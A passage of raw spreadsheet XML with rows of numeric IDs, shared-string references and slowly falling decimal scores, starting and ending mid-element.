        <v>21041.0</v>
      </c>
      <c r="B19966" s="2">
        <v>1.7633075E7</v>
      </c>
      <c r="C19966" s="2" t="s">
        <v>19219</v>
      </c>
      <c r="D19966" s="2">
        <v>1.0</v>
      </c>
      <c r="E19966" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19966" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="19967" ht="15.75" customHeight="1">
      <c r="A19967" s="1">
        <v>4706.0</v>
      </c>
      <c r="B19967" s="2">
        <v>4.3256365E7</v>
      </c>
      <c r="C19967" s="2" t="s">
        <v>19251</v>
      </c>
      <c r="D19967" s="2">
        <v>1.0</v>
      </c>
      <c r="E19967" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19967" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="19968" ht="15.75" customHeight="1">
      <c r="A19968" s="1">
        <v>10818.0</v>
      </c>
      <c r="B19968" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C19968" s="2" t="s">
        <v>19252</v>
      </c>
      <c r="D19968" s="2">
        <v>1.0</v>
      </c>
      <c r="E19968" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19968" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="19969" ht="15.75" customHeight="1">
      <c r="A19969" s="1">
        <v>10922.0</v>
      </c>
      <c r="B19969" s="2">
        <v>1.6734256E7</v>
      </c>
      <c r="C19969" s="2" t="s">
        <v>19253</v>
      </c>
      <c r="D19969" s="2">
        <v>1.0</v>
      </c>
      <c r="E19969" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19969" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="19970" ht="15.75" customHeight="1">
      <c r="A19970" s="1">
        <v>11167.0</v>
      </c>
      <c r="B19970" s="2">
        <v>1.9628217E7</v>
      </c>
      <c r="C19970" s="2" t="s">
        <v>19254</v>
      </c>
      <c r="D19970" s="2">
        <v>1.0</v>
      </c>
      <c r="E19970" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19970" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="19971" ht="15.75" customHeight="1">
      <c r="A19971" s="1">
        <v>17018.0</v>
      </c>
      <c r="B19971" s="2">
        <v>4.8456373E7</v>
      </c>
      <c r="C19971" s="2" t="s">
        <v>19255</v>
      </c>
      <c r="D19971" s="2">
        <v>1.0</v>
      </c>
      <c r="E19971" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19971" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="19972" ht="15.75" customHeight="1">
      <c r="A19972" s="1">
        <v>18284.0</v>
      </c>
      <c r="B19972" s="2">
        <v>5.2258868E7</v>
      </c>
      <c r="C19972" s="2" t="s">
        <v>19256</v>
      </c>
      <c r="D19972" s="2">
        <v>1.0</v>
      </c>
      <c r="E19972" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19972" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="19973" ht="15.75" customHeight="1">
      <c r="A19973" s="1">
        <v>8409.0</v>
      </c>
      <c r="B19973" s="2">
        <v>5.3888704E7</v>
      </c>
      <c r="C19973" s="2" t="s">
        <v>19257</v>
      </c>
      <c r="D19973" s="2">
        <v>1.0</v>
      </c>
      <c r="E19973" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19973" s="2">
        <v>0.1282679738562092</v>
      </c>
    </row>
    <row r="19974" ht="15.75" customHeight="1">
      <c r="A19974" s="1">
        <v>4837.0</v>
      </c>
      <c r="B19974" s="2">
        <v>4.3677185E7</v>
      </c>
      <c r="C19974" s="2" t="s">
        <v>19258</v>
      </c>
      <c r="D19974" s="2">
        <v>1.0</v>
      </c>
      <c r="E19974" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19974" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="19975" ht="15.75" customHeight="1">
      <c r="A19975" s="1">
        <v>30324.0</v>
      </c>
      <c r="B19975" s="2">
        <v>3.8062313E7</v>
      </c>
      <c r="C19975" s="2" t="s">
        <v>19259</v>
      </c>
      <c r="D19975" s="2">
        <v>1.0</v>
      </c>
      <c r="E19975" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19975" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="19976" ht="15.75" customHeight="1">
      <c r="A19976" s="1">
        <v>7445.0</v>
      </c>
      <c r="B19976" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C19976" s="2" t="s">
        <v>19260</v>
      </c>
      <c r="D19976" s="2">
        <v>1.0</v>
      </c>
      <c r="E19976" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19976" s="2">
        <v>0.1280193236714976</v>
      </c>
    </row>
    <row r="19977" ht="15.75" customHeight="1">
      <c r="A19977" s="1">
        <v>37.0</v>
      </c>
      <c r="B19977" s="2">
        <v>1.0642319E7</v>
      </c>
      <c r="C19977" s="2" t="s">
        <v>19261</v>
      </c>
      <c r="D19977" s="2">
        <v>1.0</v>
      </c>
      <c r="E19977" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19977" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19978" ht="15.75" customHeight="1">
      <c r="A19978" s="1">
        <v>192.0</v>
      </c>
      <c r="B19978" s="2">
        <v>1.4329424E7</v>
      </c>
      <c r="C19978" s="2" t="s">
        <v>19262</v>
      </c>
      <c r="D19978" s="2">
        <v>1.0</v>
      </c>
      <c r="E19978" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19978" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19979" ht="15.75" customHeight="1">
      <c r="A19979" s="1">
        <v>324.0</v>
      </c>
      <c r="B19979" s="2">
        <v>1.5730182E7</v>
      </c>
      <c r="C19979" s="2" t="s">
        <v>19263</v>
      </c>
      <c r="D19979" s="2">
        <v>1.0</v>
      </c>
      <c r="E19979" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19979" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19980" ht="15.75" customHeight="1">
      <c r="A19980" s="1">
        <v>728.0</v>
      </c>
      <c r="B19980" s="2">
        <v>2.077467E7</v>
      </c>
      <c r="C19980" s="2" t="s">
        <v>19264</v>
      </c>
      <c r="D19980" s="2">
        <v>1.0</v>
      </c>
      <c r="E19980" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19980" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19981" ht="15.75" customHeight="1">
      <c r="A19981" s="1">
        <v>729.0</v>
      </c>
      <c r="B19981" s="2">
        <v>2.0781588E7</v>
      </c>
      <c r="C19981" s="2" t="s">
        <v>19265</v>
      </c>
      <c r="D19981" s="2">
        <v>1.0</v>
      </c>
      <c r="E19981" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19981" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19982" ht="15.75" customHeight="1">
      <c r="A19982" s="1">
        <v>828.0</v>
      </c>
      <c r="B19982" s="2">
        <v>2.1538744E7</v>
      </c>
      <c r="C19982" s="2" t="s">
        <v>19266</v>
      </c>
      <c r="D19982" s="2">
        <v>1.0</v>
      </c>
      <c r="E19982" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19982" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19983" ht="15.75" customHeight="1">
      <c r="A19983" s="1">
        <v>1722.0</v>
      </c>
      <c r="B19983" s="2">
        <v>2.8705042E7</v>
      </c>
      <c r="C19983" s="2" t="s">
        <v>19267</v>
      </c>
      <c r="D19983" s="2">
        <v>1.0</v>
      </c>
      <c r="E19983" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19983" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19984" ht="15.75" customHeight="1">
      <c r="A19984" s="1">
        <v>2743.0</v>
      </c>
      <c r="B19984" s="2">
        <v>3.5026089E7</v>
      </c>
      <c r="C19984" s="2" t="s">
        <v>19268</v>
      </c>
      <c r="D19984" s="2">
        <v>1.0</v>
      </c>
      <c r="E19984" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19984" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19985" ht="15.75" customHeight="1">
      <c r="A19985" s="1">
        <v>3820.0</v>
      </c>
      <c r="B19985" s="2">
        <v>4.0104559E7</v>
      </c>
      <c r="C19985" s="2" t="s">
        <v>19269</v>
      </c>
      <c r="D19985" s="2">
        <v>1.0</v>
      </c>
      <c r="E19985" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19985" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19986" ht="15.75" customHeight="1">
      <c r="A19986" s="1">
        <v>4269.0</v>
      </c>
      <c r="B19986" s="2">
        <v>4.1862187E7</v>
      </c>
      <c r="C19986" s="2" t="s">
        <v>19270</v>
      </c>
      <c r="D19986" s="2">
        <v>1.0</v>
      </c>
      <c r="E19986" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19986" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19987" ht="15.75" customHeight="1">
      <c r="A19987" s="1">
        <v>5082.0</v>
      </c>
      <c r="B19987" s="2">
        <v>4.4461516E7</v>
      </c>
      <c r="C19987" s="2" t="s">
        <v>19271</v>
      </c>
      <c r="D19987" s="2">
        <v>1.0</v>
      </c>
      <c r="E19987" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19987" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19988" ht="15.75" customHeight="1">
      <c r="A19988" s="1">
        <v>5584.0</v>
      </c>
      <c r="B19988" s="2">
        <v>4.6067217E7</v>
      </c>
      <c r="C19988" s="2" t="s">
        <v>19272</v>
      </c>
      <c r="D19988" s="2">
        <v>1.0</v>
      </c>
      <c r="E19988" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19988" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19989" ht="15.75" customHeight="1">
      <c r="A19989" s="1">
        <v>6680.0</v>
      </c>
      <c r="B19989" s="2">
        <v>4.9170244E7</v>
      </c>
      <c r="C19989" s="2" t="s">
        <v>19273</v>
      </c>
      <c r="D19989" s="2">
        <v>1.0</v>
      </c>
      <c r="E19989" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19989" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19990" ht="15.75" customHeight="1">
      <c r="A19990" s="1">
        <v>7220.0</v>
      </c>
      <c r="B19990" s="2">
        <v>5.0639809E7</v>
      </c>
      <c r="C19990" s="2" t="s">
        <v>19274</v>
      </c>
      <c r="D19990" s="2">
        <v>1.0</v>
      </c>
      <c r="E19990" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19990" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19991" ht="15.75" customHeight="1">
      <c r="A19991" s="1">
        <v>10458.0</v>
      </c>
      <c r="B19991" s="2">
        <v>1.067296E7</v>
      </c>
      <c r="C19991" s="2" t="s">
        <v>19275</v>
      </c>
      <c r="D19991" s="2">
        <v>1.0</v>
      </c>
      <c r="E19991" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19991" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19992" ht="15.75" customHeight="1">
      <c r="A19992" s="1">
        <v>12783.0</v>
      </c>
      <c r="B19992" s="2">
        <v>3.1364723E7</v>
      </c>
      <c r="C19992" s="2" t="s">
        <v>19276</v>
      </c>
      <c r="D19992" s="2">
        <v>1.0</v>
      </c>
      <c r="E19992" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19992" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19993" ht="15.75" customHeight="1">
      <c r="A19993" s="1">
        <v>14313.0</v>
      </c>
      <c r="B19993" s="2">
        <v>3.8668914E7</v>
      </c>
      <c r="C19993" s="2" t="s">
        <v>19277</v>
      </c>
      <c r="D19993" s="2">
        <v>1.0</v>
      </c>
      <c r="E19993" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19993" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19994" ht="15.75" customHeight="1">
      <c r="A19994" s="1">
        <v>14317.0</v>
      </c>
      <c r="B19994" s="2">
        <v>3.8679554E7</v>
      </c>
      <c r="C19994" s="2" t="s">
        <v>19278</v>
      </c>
      <c r="D19994" s="2">
        <v>1.0</v>
      </c>
      <c r="E19994" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19994" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19995" ht="15.75" customHeight="1">
      <c r="A19995" s="1">
        <v>14411.0</v>
      </c>
      <c r="B19995" s="2">
        <v>3.9216699E7</v>
      </c>
      <c r="C19995" s="2" t="s">
        <v>19279</v>
      </c>
      <c r="D19995" s="2">
        <v>1.0</v>
      </c>
      <c r="E19995" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19995" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19996" ht="15.75" customHeight="1">
      <c r="A19996" s="1">
        <v>14979.0</v>
      </c>
      <c r="B19996" s="2">
        <v>4.1376999E7</v>
      </c>
      <c r="C19996" s="2" t="s">
        <v>19280</v>
      </c>
      <c r="D19996" s="2">
        <v>1.0</v>
      </c>
      <c r="E19996" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19996" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19997" ht="15.75" customHeight="1">
      <c r="A19997" s="1">
        <v>15091.0</v>
      </c>
      <c r="B19997" s="2">
        <v>4.1791477E7</v>
      </c>
      <c r="C19997" s="2" t="s">
        <v>19281</v>
      </c>
      <c r="D19997" s="2">
        <v>1.0</v>
      </c>
      <c r="E19997" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19997" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19998" ht="15.75" customHeight="1">
      <c r="A19998" s="1">
        <v>16326.0</v>
      </c>
      <c r="B19998" s="2">
        <v>4.5993988E7</v>
      </c>
      <c r="C19998" s="2" t="s">
        <v>19282</v>
      </c>
      <c r="D19998" s="2">
        <v>1.0</v>
      </c>
      <c r="E19998" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19998" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="19999" ht="15.75" customHeight="1">
      <c r="A19999" s="1">
        <v>18491.0</v>
      </c>
      <c r="B19999" s="2">
        <v>5.2912202E7</v>
      </c>
      <c r="C19999" s="2" t="s">
        <v>19283</v>
      </c>
      <c r="D19999" s="2">
        <v>1.0</v>
      </c>
      <c r="E19999" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19999" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="20000" ht="15.75" customHeight="1">
      <c r="A20000" s="1">
        <v>19112.0</v>
      </c>
      <c r="B20000" s="2">
        <v>5.4739614E7</v>
      </c>
      <c r="C20000" s="2" t="s">
        <v>19284</v>
      </c>
      <c r="D20000" s="2">
        <v>1.0</v>
      </c>
      <c r="E20000" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20000" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="20001" ht="15.75" customHeight="1">
      <c r="A20001" s="1">
        <v>24140.0</v>
      </c>
      <c r="B20001" s="2">
        <v>1.0051235E7</v>
      </c>
      <c r="C20001" s="2" t="s">
        <v>19285</v>
      </c>
      <c r="D20001" s="2">
        <v>1.0</v>
      </c>
      <c r="E20001" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20001" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="20002" ht="15.75" customHeight="1">
      <c r="A20002" s="1">
        <v>29065.0</v>
      </c>
      <c r="B20002" s="2">
        <v>3.0286567E7</v>
      </c>
      <c r="C20002" s="2" t="s">
        <v>19286</v>
      </c>
      <c r="D20002" s="2">
        <v>1.0</v>
      </c>
      <c r="E20002" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20002" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="20003" ht="15.75" customHeight="1">
      <c r="A20003" s="1">
        <v>29875.0</v>
      </c>
      <c r="B20003" s="2">
        <v>3.6022638E7</v>
      </c>
      <c r="C20003" s="2" t="s">
        <v>19287</v>
      </c>
      <c r="D20003" s="2">
        <v>1.0</v>
      </c>
      <c r="E20003" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20003" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="20004" ht="15.75" customHeight="1">
      <c r="A20004" s="1">
        <v>31763.0</v>
      </c>
      <c r="B20004" s="2">
        <v>5215971.0</v>
      </c>
      <c r="C20004" s="2" t="s">
        <v>19288</v>
      </c>
      <c r="D20004" s="2">
        <v>1.0</v>
      </c>
      <c r="E20004" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20004" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="20005" ht="15.75" customHeight="1">
      <c r="A20005" s="1">
        <v>33243.0</v>
      </c>
      <c r="B20005" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C20005" s="2" t="s">
        <v>19289</v>
      </c>
      <c r="D20005" s="2">
        <v>1.0</v>
      </c>
      <c r="E20005" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20005" s="2">
        <v>0.1279239766081872</v>
      </c>
    </row>
    <row r="20006" ht="15.75" customHeight="1">
      <c r="A20006" s="1">
        <v>3847.0</v>
      </c>
      <c r="B20006" s="2">
        <v>4.0247711E7</v>
      </c>
      <c r="C20006" s="2" t="s">
        <v>19290</v>
      </c>
      <c r="D20006" s="2">
        <v>1.0</v>
      </c>
      <c r="E20006" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20006" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="20007" ht="15.75" customHeight="1">
      <c r="A20007" s="1">
        <v>761.0</v>
      </c>
      <c r="B20007" s="2">
        <v>2.1014662E7</v>
      </c>
      <c r="C20007" s="2" t="s">
        <v>19291</v>
      </c>
      <c r="D20007" s="2">
        <v>1.0</v>
      </c>
      <c r="E20007" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20007" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="20008" ht="15.75" customHeight="1">
      <c r="A20008" s="1">
        <v>15897.0</v>
      </c>
      <c r="B20008" s="2">
        <v>4.4574801E7</v>
      </c>
      <c r="C20008" s="2" t="s">
        <v>19292</v>
      </c>
      <c r="D20008" s="2">
        <v>1.0</v>
      </c>
      <c r="E20008" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20008" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="20009" ht="15.75" customHeight="1">
      <c r="A20009" s="1">
        <v>18289.0</v>
      </c>
      <c r="B20009" s="2">
        <v>5.2301392E7</v>
      </c>
      <c r="C20009" s="2" t="s">
        <v>19293</v>
      </c>
      <c r="D20009" s="2">
        <v>1.0</v>
      </c>
      <c r="E20009" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20009" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="20010" ht="15.75" customHeight="1">
      <c r="A20010" s="1">
        <v>2043.0</v>
      </c>
      <c r="B20010" s="2">
        <v>3.0896386E7</v>
      </c>
      <c r="C20010" s="2" t="s">
        <v>19294</v>
      </c>
      <c r="D20010" s="2">
        <v>1.0</v>
      </c>
      <c r="E20010" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20010" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="20011" ht="15.75" customHeight="1">
      <c r="A20011" s="1">
        <v>7210.0</v>
      </c>
      <c r="B20011" s="2">
        <v>5.0598531E7</v>
      </c>
      <c r="C20011" s="2" t="s">
        <v>19295</v>
      </c>
      <c r="D20011" s="2">
        <v>1.0</v>
      </c>
      <c r="E20011" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20011" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="20012" ht="15.75" customHeight="1">
      <c r="A20012" s="1">
        <v>10751.0</v>
      </c>
      <c r="B20012" s="2">
        <v>1.5474597E7</v>
      </c>
      <c r="C20012" s="2" t="s">
        <v>19296</v>
      </c>
      <c r="D20012" s="2">
        <v>1.0</v>
      </c>
      <c r="E20012" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20012" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="20013" ht="15.75" customHeight="1">
      <c r="A20013" s="1">
        <v>11249.0</v>
      </c>
      <c r="B20013" s="2">
        <v>2.0493657E7</v>
      </c>
      <c r="C20013" s="2" t="s">
        <v>19297</v>
      </c>
      <c r="D20013" s="2">
        <v>1.0</v>
      </c>
      <c r="E20013" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20013" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="20014" ht="15.75" customHeight="1">
      <c r="A20014" s="1">
        <v>22855.0</v>
      </c>
      <c r="B20014" s="2">
        <v>4.708206E7</v>
      </c>
      <c r="C20014" s="2" t="s">
        <v>19298</v>
      </c>
      <c r="D20014" s="2">
        <v>1.0</v>
      </c>
      <c r="E20014" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20014" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="20015" ht="15.75" customHeight="1">
      <c r="A20015" s="1">
        <v>25478.0</v>
      </c>
      <c r="B20015" s="2">
        <v>1.4019762E7</v>
      </c>
      <c r="C20015" s="2" t="s">
        <v>5634</v>
      </c>
      <c r="D20015" s="2">
        <v>1.0</v>
      </c>
      <c r="E20015" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20015" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="20016" ht="15.75" customHeight="1">
      <c r="A20016" s="1">
        <v>13228.0</v>
      </c>
      <c r="B20016" s="2">
        <v>3.4232388E7</v>
      </c>
      <c r="C20016" s="2" t="s">
        <v>19299</v>
      </c>
      <c r="D20016" s="2">
        <v>1.0</v>
      </c>
      <c r="E20016" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20016" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="20017" ht="15.75" customHeight="1">
      <c r="A20017" s="1">
        <v>13171.0</v>
      </c>
      <c r="B20017" s="2">
        <v>3.3984862E7</v>
      </c>
      <c r="C20017" s="2" t="s">
        <v>19300</v>
      </c>
      <c r="D20017" s="2">
        <v>1.0</v>
      </c>
      <c r="E20017" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20017" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="20018" ht="15.75" customHeight="1">
      <c r="A20018" s="1">
        <v>22433.0</v>
      </c>
      <c r="B20018" s="2">
        <v>3.6190481E7</v>
      </c>
      <c r="C20018" s="2" t="s">
        <v>19301</v>
      </c>
      <c r="D20018" s="2">
        <v>1.0</v>
      </c>
      <c r="E20018" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20018" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="20019" ht="15.75" customHeight="1">
      <c r="A20019" s="1">
        <v>17227.0</v>
      </c>
      <c r="B20019" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C20019" s="2" t="s">
        <v>19302</v>
      </c>
      <c r="D20019" s="2">
        <v>1.0</v>
      </c>
      <c r="E20019" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20019" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="20020" ht="15.75" customHeight="1">
      <c r="A20020" s="1">
        <v>2179.0</v>
      </c>
      <c r="B20020" s="2">
        <v>3.1813383E7</v>
      </c>
      <c r="C20020" s="2" t="s">
        <v>19303</v>
      </c>
      <c r="D20020" s="2">
        <v>1.0</v>
      </c>
      <c r="E20020" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20020" s="2">
        <v>0.1270928462709285</v>
      </c>
    </row>
    <row r="20021" ht="15.75" customHeight="1">
      <c r="A20021" s="1">
        <v>2606.0</v>
      </c>
      <c r="B20021" s="2">
        <v>3.4409792E7</v>
      </c>
      <c r="C20021" s="2" t="s">
        <v>19304</v>
      </c>
      <c r="D20021" s="2">
        <v>1.0</v>
      </c>
      <c r="E20021" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20021" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="20022" ht="15.75" customHeight="1">
      <c r="A20022" s="1">
        <v>17431.0</v>
      </c>
      <c r="B20022" s="2">
        <v>4.9733226E7</v>
      </c>
      <c r="C20022" s="2" t="s">
        <v>19305</v>
      </c>
      <c r="D20022" s="2">
        <v>1.0</v>
      </c>
      <c r="E20022" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20022" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="20023" ht="15.75" customHeight="1">
      <c r="A20023" s="1">
        <v>832.0</v>
      </c>
      <c r="B20023" s="2">
        <v>2.1570167E7</v>
      </c>
      <c r="C20023" s="2" t="s">
        <v>19174</v>
      </c>
      <c r="D20023" s="2">
        <v>1.0</v>
      </c>
      <c r="E20023" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20023" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="20024" ht="15.75" customHeight="1">
      <c r="A20024" s="1">
        <v>8682.0</v>
      </c>
      <c r="B20024" s="2">
        <v>5.440523E7</v>
      </c>
      <c r="C20024" s="2" t="s">
        <v>19306</v>
      </c>
      <c r="D20024" s="2">
        <v>1.0</v>
      </c>
      <c r="E20024" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20024" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="20025" ht="15.75" customHeight="1">
      <c r="A20025" s="1">
        <v>24712.0</v>
      </c>
      <c r="B20025" s="2">
        <v>1.1687344E7</v>
      </c>
      <c r="C20025" s="2" t="s">
        <v>19307</v>
      </c>
      <c r="D20025" s="2">
        <v>1.0</v>
      </c>
      <c r="E20025" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20025" s="2">
        <v>0.1266339869281046</v>
      </c>
    </row>
    <row r="20026" ht="15.75" customHeight="1">
      <c r="A20026" s="1">
        <v>2125.0</v>
      </c>
      <c r="B20026" s="2">
        <v>3.1392499E7</v>
      </c>
      <c r="C20026" s="2" t="s">
        <v>19308</v>
      </c>
      <c r="D20026" s="2">
        <v>1.0</v>
      </c>
      <c r="E20026" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20026" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="20027" ht="15.75" customHeight="1">
      <c r="A20027" s="1">
        <v>19325.0</v>
      </c>
      <c r="B20027" s="2">
        <v>5.5308727E7</v>
      </c>
      <c r="C20027" s="2" t="s">
        <v>19309</v>
      </c>
      <c r="D20027" s="2">
        <v>1.0</v>
      </c>
      <c r="E20027" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20027" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="20028" ht="15.75" customHeight="1">
      <c r="A20028" s="1">
        <v>28596.0</v>
      </c>
      <c r="B20028" s="2">
        <v>2.6996953E7</v>
      </c>
      <c r="C20028" s="2" t="s">
        <v>19224</v>
      </c>
      <c r="D20028" s="2">
        <v>1.0</v>
      </c>
      <c r="E20028" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20028" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="20029" ht="15.75" customHeight="1">
      <c r="A20029" s="1">
        <v>3589.0</v>
      </c>
      <c r="B20029" s="2">
        <v>3.9037503E7</v>
      </c>
      <c r="C20029" s="2" t="s">
        <v>19310</v>
      </c>
      <c r="D20029" s="2">
        <v>1.0</v>
      </c>
      <c r="E20029" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20029" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="20030" ht="15.75" customHeight="1">
      <c r="A20030" s="1">
        <v>9589.0</v>
      </c>
      <c r="B20030" s="2">
        <v>5.6099482E7</v>
      </c>
      <c r="C20030" s="2" t="s">
        <v>19311</v>
      </c>
      <c r="D20030" s="2">
        <v>1.0</v>
      </c>
      <c r="E20030" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20030" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="20031" ht="15.75" customHeight="1">
      <c r="A20031" s="1">
        <v>15205.0</v>
      </c>
      <c r="B20031" s="2">
        <v>4.2109347E7</v>
      </c>
      <c r="C20031" s="2" t="s">
        <v>19312</v>
      </c>
      <c r="D20031" s="2">
        <v>1.0</v>
      </c>
      <c r="E20031" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20031" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="20032" ht="15.75" customHeight="1">
      <c r="A20032" s="1">
        <v>17782.0</v>
      </c>
      <c r="B20032" s="2">
        <v>5.0779006E7</v>
      </c>
      <c r="C20032" s="2" t="s">
        <v>19313</v>
      </c>
      <c r="D20032" s="2">
        <v>1.0</v>
      </c>
      <c r="E20032" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20032" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="20033" ht="15.75" customHeight="1">
      <c r="A20033" s="1">
